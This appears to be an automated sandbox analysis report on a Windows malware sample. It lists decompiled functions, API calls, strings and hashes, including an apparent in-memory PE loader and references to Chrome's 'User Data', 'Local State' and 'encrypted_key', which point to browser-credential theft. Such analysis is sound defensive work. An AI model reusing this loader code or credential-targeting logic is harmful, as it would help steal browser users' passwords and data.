                                                                                                                0x01262b6f
                                                                                                                0x00000000
                                                                                                                0x01262b6f
                                                                                                                0x01262ad6
                                                                                                                0x01262add
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01262ae3
                                                                                                                0x00000000
                                                                                                                0x01262ae3

                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000105,?,01262A26,00000000,012A4F00,00000010,0127ED09,?,?,?,0129BD34,?,?,0000000C), ref: 01262B5B
                                                                                                                • SetLastError.KERNEL32(0000006F,?,01262A26,00000000,012A4F00,00000010,0127ED09,?,?,?,0129BD34,?,?,0000000C,0127ED62,00000000), ref: 01262B6F
                                                                                                                  • Part of subcall function 012629BA: GetProcAddress.KERNEL32(75147590,?), ref: 012629DC
                                                                                                                • GetLastError.KERNEL32(00000020), ref: 01262BC6
                                                                                                                • LoadLibraryW.KERNEL32(Comctl32.dll,00000000,00000000,00000002,Comctl32.dll,00000040), ref: 01262C41
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$AddressFileLibraryLoadModuleNameProc
                                                                                                                • String ID: Comctl32.dll$GetModuleHandleExW$QueryActCtxW
                                                                                                                • API String ID: 3640817601-2998613672
                                                                                                                • Opcode ID: 68805ecbfc06a42f02451a779712fbfd1fff5ad0bc292b1a12923ff41d81b8c7
                                                                                                                • Instruction ID: ef63e15f72aac1a67842316ec90bf5c5893c78b6dedc90dc9ee55fbf18e0e049
                                                                                                                • Opcode Fuzzy Hash: 68805ecbfc06a42f02451a779712fbfd1fff5ad0bc292b1a12923ff41d81b8c7
                                                                                                                • Instruction Fuzzy Hash: B741B4B0A60616E6EF309FA99C8DBAE767CEB44714F140199E608E61C4EB74CAC1CF11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100052E4, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 1000530B
                                                                                                                • GetShortPathNameW.KERNEL32 ref: 10005320
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,00000000,C:\Users\user\AppData\Local\Google\Chrome\User Data\Default), ref: 10005340
                                                                                                                • _malloc.LIBCMT ref: 10005349
                                                                                                                  • Part of subcall function 1007FDFC: __FF_MSGBANNER.LIBCMT ref: 1007FE13
                                                                                                                  • Part of subcall function 1007FDFC: __NMSG_WRITE.LIBCMT ref: 1007FE1A
                                                                                                                  • Part of subcall function 1007FDFC: RtlAllocateHeap.NTDLL(014D0000,00000000,00000001,00000001,?,?,?,1007F6B1,00000001,00000000,?,?,?,1007F5DA,?), ref: 1007FE3F
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,C:\Users\user\AppData\Local\Google\Chrome\User Data\Default), ref: 10005366
                                                                                                                • _free.LIBCMT ref: 1000536D
                                                                                                                  • Part of subcall function 1007FDC4: RtlFreeHeap.NTDLL(00000000,00000000,?,1008A357,00000000,1007F6B1,00000001,00000000,?,?,?,1007F5DA,?,?,?,10001747), ref: 1007FDD8
                                                                                                                  • Part of subcall function 1007FDC4: GetLastError.KERNEL32(00000000,?,1008A357,00000000,1007F6B1,00000001,00000000,?,?,?,1007F5DA,?,?,?,10001747,?), ref: 1007FDEA
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Google\Chrome\User Data\Default, xrefs: 100052F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharHeapMultiWide$AllocateErrorFreeLastNamePathShort_free_malloc_memset
                                                                                                                • String ID: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                                                                                                                • API String ID: 186392918-2297250039
                                                                                                                • Opcode ID: 7ab81348be82fd547043b86d2892f9237f71ae27c470eb790ae02748b59b6d42
                                                                                                                • Instruction ID: d79d53f34bfc423dfe08efd1f88ca5abe3d2dbf2519381fba9104c4c0b1536fc
                                                                                                                • Opcode Fuzzy Hash: 7ab81348be82fd547043b86d2892f9237f71ae27c470eb790ae02748b59b6d42
                                                                                                                • Instruction Fuzzy Hash: 1011C6B2A0421D7FF720CB64DCC9DBB73ACEB453D0F10066EB810D2180EAA09E4186B4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012710C0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31registrylibraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 25%
                                                                                                                			E012710C0(intOrPtr _a4, intOrPtr _a8) {
				_Unknown_base(*)()* _t3;
				void* _t5;
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;

				_t3 =  *0x1389e9c; // 0xcd50525b
				if(_t3 != 0) {
					__imp__DecodePointer(_t3);
					_t8 = _t3;
					L4:
					if(_t8 == 0) {
						L6:
						return 0x80004005;
					}
					_t5 =  *_t8(_a4, _a8); // executed
					return _t5;
				}
				_t6 = GetModuleHandleW(L"kernel32.dll");
				if(_t6 == 0) {
					goto L6;
				}
				_t7 = GetProcAddress(_t6, "RegisterApplicationRestart");
				_t8 = _t7;
				__imp__EncodePointer(_t8); // executed
				 *0x1389e9c = _t7;
				goto L4;
			}








                                                                                                                0x012710c3
                                                                                                                0x012710cb
                                                                                                                0x012710f9
                                                                                                                0x012710ff
                                                                                                                0x01271101
                                                                                                                0x01271103
                                                                                                                0x0127110f
                                                                                                                0x00000000
                                                                                                                0x0127110f
                                                                                                                0x0127110b
                                                                                                                0x00000000
                                                                                                                0x0127110b
                                                                                                                0x012710d2
                                                                                                                0x012710da
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012710e2
                                                                                                                0x012710e8
                                                                                                                0x012710eb
                                                                                                                0x012710f1
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,012645A3,?,?), ref: 012710D2
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 012710E2
                                                                                                                • RtlEncodePointer.NTDLL(00000000,?,?,012645A3,?,?), ref: 012710EB
                                                                                                                • DecodePointer.KERNEL32(CD50525B,?,?,012645A3,?,?), ref: 012710F9
                                                                                                                • RegisterApplicationRestart.KERNEL32(?,?,?,?,012645A3,?,?), ref: 0127110B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Pointer$AddressApplicationDecodeEncodeHandleModuleProcRegisterRestart
                                                                                                                • String ID: RegisterApplicationRestart$kernel32.dll
                                                                                                                • API String ID: 2334171955-1259503209
                                                                                                                • Opcode ID: f0872d4836b1a3b5d4671e94516431ac09331c01ae5be9abd17b5ef3ab85b2c1
                                                                                                                • Instruction ID: 39ea6be2e02199a75c0fd83e36ddf4aa3f3fd1c79edb65d085763d2b7c1e8b38
                                                                                                                • Opcode Fuzzy Hash: f0872d4836b1a3b5d4671e94516431ac09331c01ae5be9abd17b5ef3ab85b2c1
                                                                                                                • Instruction Fuzzy Hash: C2F03731D61316AB9F215B6DBC0E9AA3B9C9E086657004069FE0DEB108D771D4908BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012701ED, Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E012701ED(void* __ecx) {
				int _t5;
				void* _t15;
				struct HDC__* _t17;

				_t15 = __ecx;
				_t5 = GetSystemMetrics(0xb); // executed
				 *((intOrPtr*)(_t15 + 8)) = _t5;
				 *((intOrPtr*)(_t15 + 0xc)) = GetSystemMetrics(0xc);
				 *0x1389e00 = GetSystemMetrics(2) + 1;
				 *0x1389e04 = GetSystemMetrics(3) + 1;
				_t17 = GetDC(0);
				 *((intOrPtr*)(_t15 + 0x18)) = GetDeviceCaps(_t17, 0x58);
				 *((intOrPtr*)(_t15 + 0x1c)) = GetDeviceCaps(_t17, 0x5a);
				return ReleaseDC(0, _t17);
			}






                                                                                                                0x012701f5
                                                                                                                0x012701fa
                                                                                                                0x012701fe
                                                                                                                0x01270205
                                                                                                                0x0127020d
                                                                                                                0x01270217
                                                                                                                0x01270228
                                                                                                                0x01270232
                                                                                                                0x0127023a
                                                                                                                0x01270246

                                                                                                                APIs
                                                                                                                • KiUserCallbackDispatcher.NTDLL ref: 012701FA
                                                                                                                • GetSystemMetrics.USER32 ref: 01270201
                                                                                                                • GetSystemMetrics.USER32 ref: 01270208
                                                                                                                • GetSystemMetrics.USER32 ref: 01270212
                                                                                                                • GetDC.USER32(00000000), ref: 0127021C
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0127022D
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01270235
                                                                                                                • ReleaseDC.USER32 ref: 0127023D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 1031845853-0
                                                                                                                • Opcode ID: a83cf3e531f8740e28f8267acb9a6841ed7b7c0b31e7fdd48ba071432d622447
                                                                                                                • Instruction ID: 8d86ef16c3e0820746c72143038eb83313e34a385fe5da1c49ad3fa4a85a915f
                                                                                                                • Opcode Fuzzy Hash: a83cf3e531f8740e28f8267acb9a6841ed7b7c0b31e7fdd48ba071432d622447
                                                                                                                • Instruction Fuzzy Hash: 34F0F970E40314AAEB205F75AC4DB2A7F68EB85B65F00405AEA049F2C9D6B59800CFD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01262210, Relevance: 10.8, APIs: 7, Instructions: 261memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E01262210(void* __ecx) {
				void* _v8;
				void* __edi;
				intOrPtr _t22;
				void* _t23;
				void* _t27;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t35;
				intOrPtr _t41;
				void* _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t52;
				intOrPtr* _t63;
				intOrPtr* _t70;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t84;

				_push(__ecx);
				_t84 =  *0x12ab800 - 0x5a4d; // 0x5a4d
				if(_t84 == 0) {
					_t22 =  *0x12ab83c; // 0xf0
					_t2 = _t22 + 0x12ab800; // 0x12ab8f0
					_t52 = _t2;
					if( *((intOrPtr*)(_t22 + 0x12ab800)) == 0x4550) {
						_t3 = _t52 + 0x50; // 0xe4000
						_t4 = _t52 + 0x34; // 0x10000000, executed
						_t23 = VirtualAlloc( *_t4,  *_t3, 0x2000, 4); // executed
						_t75 = _t23;
						_v8 = _t75;
						if(_t75 != 0) {
							L15:
							_t70 = HeapAlloc(GetProcessHeap(), 0, 0x14);
							 *(_t70 + 4) = _t75;
							 *(_t70 + 0xc) = 0;
							 *(_t70 + 8) = 0;
							 *(_t70 + 0x10) = 0;
							_t12 = _t52 + 0x50; // 0xe4000
							VirtualAlloc(_t75,  *_t12, 0x1000, 4); // executed
							_t13 = _t52 + 0x54; // 0x400
							_t27 = VirtualAlloc(_t75,  *_t13, 0x1000, 4);
							_t14 = _t52 + 0x54; // 0x400
							_t76 = _t27;
							E012882F0(_t76, 0x12ab800,  *_t14 +  *0x12ab83c);
							_t29 =  *0x12ab83c; // 0xf0
							_t30 = _t29 + _t76;
							_t77 = _v8;
							 *_t70 = _t30;
							 *((intOrPtr*)(_t30 + 0x34)) = _t77;
							_t31 = 0xa;
							do {
								0;
								_t31 = _t31 - 1;
							} while (_t31 != 0);
							E01261D20(_t52, _t70); // executed
							_t33 = 0xa;
							do {
								0;
								_t33 = _t33 - 1;
							} while (_t33 != 0);
							_t17 = _t52 + 0x34; // 0x10000000
							_t67 = _t77 !=  *_t17;
							if(_t77 !=  *_t17) {
								E01261FC0(_t70, _t67);
							}
							_t34 = 0xa;
							do {
								0;
								_t34 = _t34 - 1;
							} while (_t34 != 0);
							_t35 = E01262070(_t70); // executed
							if(_t35 == 0) {
								L29:
								E012624D0(_t70, _t70);
								return 0;
							} else {
								E01261E40(_t70); // executed
								E01261D00();
								_t41 =  *((intOrPtr*)( *_t70 + 0x28));
								if(_t41 == 0) {
									L28:
									return _t70;
								} else {
									_t63 = _t41 + _t77;
									if(_t63 == 0) {
										goto L29;
									} else {
										E01261D00();
										_t44 =  *_t63(_t77, "true", 0); // executed
										if(_t44 == 0) {
											goto L29;
										} else {
											 *(_t70 + 0x10) = 1;
											goto L28;
										}
									}
								}
							}
						} else {
							_t6 = _t52 + 0x50; // 0xe4000
							_t46 = VirtualAlloc(_t23,  *_t6, 0x2000, 4);
							_t75 = _t46;
							_v8 = _t46;
							if(_t75 != 0) {
								goto L15;
							} else {
								_t47 = 0xa;
								do {
									0;
									_t47 = _t47 - 1;
								} while (_t47 != 0);
								return _t47;
							}
						}
					} else {
						_t48 = 0xa;
						do {
							0;
							_t48 = _t48 - 1;
						} while (_t48 != 0);
						return _t48;
					}
				} else {
					_t49 = 0xa;
					do {
						0;
						_t49 = _t49 - 1;
					} while (_t49 != 0);
					_t50 = 0xa;
					do {
						0;
						_t50 = _t50 - 1;
					} while (_t50 != 0);
					return _t50;
				}
			}




























                                                                                                                0x01262213
                                                                                                                0x01262219
                                                                                                                0x01262220
                                                                                                                0x01262257
                                                                                                                0x01262267
                                                                                                                0x01262267
                                                                                                                0x0126226d
                                                                                                                0x0126229b
                                                                                                                0x0126229e
                                                                                                                0x012622a1
                                                                                                                0x012622a3
                                                                                                                0x012622a5
                                                                                                                0x012622aa
                                                                                                                0x012622e1
                                                                                                                0x012622f2
                                                                                                                0x012622fb
                                                                                                                0x012622fe
                                                                                                                0x01262305
                                                                                                                0x0126230c
                                                                                                                0x01262313
                                                                                                                0x01262317
                                                                                                                0x01262324
                                                                                                                0x01262328
                                                                                                                0x0126232e
                                                                                                                0x01262331
                                                                                                                0x01262340
                                                                                                                0x01262345
                                                                                                                0x0126234d
                                                                                                                0x0126234f
                                                                                                                0x01262352
                                                                                                                0x01262354
                                                                                                                0x01262357
                                                                                                                0x01262360
                                                                                                                0x01262366
                                                                                                                0x0126236a
                                                                                                                0x0126236a
                                                                                                                0x01262376
                                                                                                                0x0126237e
                                                                                                                0x01262383
                                                                                                                0x01262389
                                                                                                                0x0126238d
                                                                                                                0x0126238d
                                                                                                                0x01262398
                                                                                                                0x01262398
                                                                                                                0x0126239b
                                                                                                                0x0126239f
                                                                                                                0x0126239f
                                                                                                                0x012623a4
                                                                                                                0x012623b0
                                                                                                                0x012623b6
                                                                                                                0x012623ba
                                                                                                                0x012623ba
                                                                                                                0x012623c5
                                                                                                                0x012623cc
                                                                                                                0x0126240a
                                                                                                                0x0126240c
                                                                                                                0x01262419
                                                                                                                0x012623ce
                                                                                                                0x012623d0
                                                                                                                0x012623d5
                                                                                                                0x012623dc
                                                                                                                0x012623e1
                                                                                                                0x01262401
                                                                                                                0x01262409
                                                                                                                0x012623e3
                                                                                                                0x012623e3
                                                                                                                0x012623e8
                                                                                                                0x00000000
                                                                                                                0x012623ea
                                                                                                                0x012623ea
                                                                                                                0x012623f4
                                                                                                                0x012623f8
                                                                                                                0x00000000
                                                                                                                0x012623fa
                                                                                                                0x012623fa
                                                                                                                0x00000000
                                                                                                                0x012623fa
                                                                                                                0x012623f8
                                                                                                                0x012623e8
                                                                                                                0x012623e1
                                                                                                                0x012622ac
                                                                                                                0x012622b3
                                                                                                                0x012622b7
                                                                                                                0x012622b9
                                                                                                                0x012622bb
                                                                                                                0x012622c0
                                                                                                                0x00000000
                                                                                                                0x012622c2
                                                                                                                0x012622c2
                                                                                                                0x012622c7
                                                                                                                0x012622cd
                                                                                                                0x012622d1
                                                                                                                0x012622d1
                                                                                                                0x012622e0
                                                                                                                0x012622e0
                                                                                                                0x012622c0
                                                                                                                0x0126226f
                                                                                                                0x0126226f
                                                                                                                0x01262274
                                                                                                                0x0126227a
                                                                                                                0x0126227e
                                                                                                                0x0126227e
                                                                                                                0x0126228b
                                                                                                                0x0126228b
                                                                                                                0x01262222
                                                                                                                0x01262222
                                                                                                                0x01262227
                                                                                                                0x0126222d
                                                                                                                0x01262231
                                                                                                                0x01262231
                                                                                                                0x0126223a
                                                                                                                0x01262240
                                                                                                                0x01262246
                                                                                                                0x0126224a
                                                                                                                0x0126224a
                                                                                                                0x01262256
                                                                                                                0x01262256

                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNELBASE(10000000,000E4000,00002000,00000004,00000000,00000000,?,?,?,012625DF,00000000,012A7B78,DDD5D539,00000000), ref: 012622A1
                                                                                                                • VirtualAlloc.KERNEL32(00000000,000E4000,00002000,00000004,?,?,?,012625DF,00000000,012A7B78,DDD5D539,00000000), ref: 012622B7
                                                                                                                  • Part of subcall function 012624D0: LoadLibraryA.KERNEL32(KERNEL32.dll,FreeLibrary,?,012AB8F0,01262411,?,00000000), ref: 012624DE
                                                                                                                  • Part of subcall function 012624D0: GetProcAddress.KERNEL32(00000000), ref: 012624E5
                                                                                                                  • Part of subcall function 012624D0: _free.LIBCMT ref: 01262556
                                                                                                                  • Part of subcall function 012624D0: VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0126256D
                                                                                                                  • Part of subcall function 012624D0: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 01262576
                                                                                                                  • Part of subcall function 012624D0: HeapFree.KERNEL32(00000000,?,00000000), ref: 0126257D
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000014,?,?,?,012625DF,00000000,012A7B78,DDD5D539,00000000), ref: 012622E5
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,012625DF,00000000,012A7B78,DDD5D539,00000000), ref: 012622EC
                                                                                                                • VirtualAlloc.KERNELBASE(00000000,000E4000,00001000,00000004,?,?,?,012625DF,00000000,012A7B78,DDD5D539,00000000), ref: 01262317
                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000400,00001000,00000004,?,?,?,012625DF,00000000,012A7B78,DDD5D539,00000000), ref: 01262328
                                                                                                                • _memmove.LIBCMT ref: 01262340
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual$Heap$FreeProcess$AddressLibraryLoadProc_free_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 605661745-0
                                                                                                                • Opcode ID: 218e4f9d55008196990c00b9d6e1c0efdcdc8fbf1f4852b804eb62f0ffa025ca
                                                                                                                • Instruction ID: cdf9637771b0e7ce0c696ee0c20d4a076449f85f5a0c2f4df9fa6417f9bc1270
                                                                                                                • Opcode Fuzzy Hash: 218e4f9d55008196990c00b9d6e1c0efdcdc8fbf1f4852b804eb62f0ffa025ca
                                                                                                                • Instruction Fuzzy Hash: D6412331751206EBEB219F6CEC44B69B7A9EF45754F440298EB08DB2C0D7B6E894C7C1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100035D8, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 100035E2
                                                                                                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 1000362D
                                                                                                                • _free.LIBCMT ref: 10003712
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FolderH_prolog3_PathSpecial_free
                                                                                                                • String ID: \Google\Chrome\User Data\Local State$encrypted_key$os_crypt
                                                                                                                • API String ID: 1037526921-1506058621
                                                                                                                • Opcode ID: 42692dd9c548e8a339efa0849990398c9397aecc8162203374f40d16da1d58c1
                                                                                                                • Instruction ID: 4182d405d55ab807ea4e47f9ee81b8abed20dd8ce9b35baf29e5b0e75cf036dc
                                                                                                                • Opcode Fuzzy Hash: 42692dd9c548e8a339efa0849990398c9397aecc8162203374f40d16da1d58c1
                                                                                                                • Instruction Fuzzy Hash: CC318E74900259AFEB29DB60CC52BEEB775EF05340F1081D9A0496B286DF756F85CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000374B, Relevance: 9.5, APIs: 3, Strings: 2, Instructions: 764COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 1000382E
                                                                                                                • _memset.LIBCMT ref: 10003843
                                                                                                                  • Part of subcall function 100061CF: _memmove.LIBCMT ref: 10006234
                                                                                                                  • Part of subcall function 100035D8: __EH_prolog3_GS.LIBCMT ref: 100035E2
                                                                                                                  • Part of subcall function 100035D8: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 1000362D
                                                                                                                  • Part of subcall function 100035D8: _free.LIBCMT ref: 10003712
                                                                                                                  • Part of subcall function 100069AE: _memmove.LIBCMT ref: 100069CE
                                                                                                                  • Part of subcall function 1008094B: _malloc.LIBCMT ref: 10080963
                                                                                                                • __snprintf_s.LIBCMT ref: 100039E7
                                                                                                                  • Part of subcall function 1008094B: std::exception::exception.LIBCMT ref: 10080981
                                                                                                                  • Part of subcall function 1008094B: __CxxThrowException@8.LIBCMT ref: 10080996
                                                                                                                  • Part of subcall function 10002AE0: __EH_prolog3.LIBCMT ref: 10002AE7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _memmove_memset$Exception@8FolderH_prolog3H_prolog3_PathSpecialThrow__snprintf_s_free_mallocstd::exception::exception
                                                                                                                • String ID: !$recovered text:
                                                                                                                • API String ID: 2865521528-3482387835
                                                                                                                • Opcode ID: 9635afd812715e61b5da66fab524f001e05f193fc0f205a4466fb8400e348020
                                                                                                                • Instruction ID: cb0ac473eee51f568d295f43660043ec87a9a74c11c25a49b7fec54254de207d
                                                                                                                • Opcode Fuzzy Hash: 9635afd812715e61b5da66fab524f001e05f193fc0f205a4466fb8400e348020
                                                                                                                • Instruction Fuzzy Hash: C0623675905269AEEB21DBA4CC50AEEB7F9EF15380F1481E9F009A2185DF706F85CF21
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01261690, Relevance: 9.1, APIs: 6, Instructions: 94windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSystemMenu.USER32(00000000,00000000,DDD5D539), ref: 012616C7
                                                                                                                • AppendMenuA.USER32 ref: 01261741
                                                                                                                • AppendMenuA.USER32 ref: 0126174E
                                                                                                                • SendMessageA.USER32(?,00000080,?,?), ref: 01261787
                                                                                                                • SendMessageA.USER32(00000000,00000080,00000000,?), ref: 01261799
                                                                                                                • ExitProcess.KERNEL32 ref: 012617AC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Menu$AppendMessageSend$ExitProcessSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 239795094-0
                                                                                                                • Opcode ID: 485e6953ed9e9cc677b7e060ca4155b1af0efb0a6003c407a825e5fbd14809ab
                                                                                                                • Instruction ID: 6ad8bc5c9f975368288be1adad10cda68d2bee28ac60a438831f62694a0a0844
                                                                                                                • Opcode Fuzzy Hash: 485e6953ed9e9cc677b7e060ca4155b1af0efb0a6003c407a825e5fbd14809ab
                                                                                                                • Instruction Fuzzy Hash: D3310731650206AFDF259F68CC49F6E7BB9FF44720F144128FA15AB2D0CB71A890CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126435B, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 196COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0126439A
                                                                                                                • CoCreateGuid.OLE32(?,00000000,00000000,0000002C,?,00000000,?,?,?,80070057,00000000,?,01263813,00000000), ref: 012643F7
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 0126456A
                                                                                                                Strings
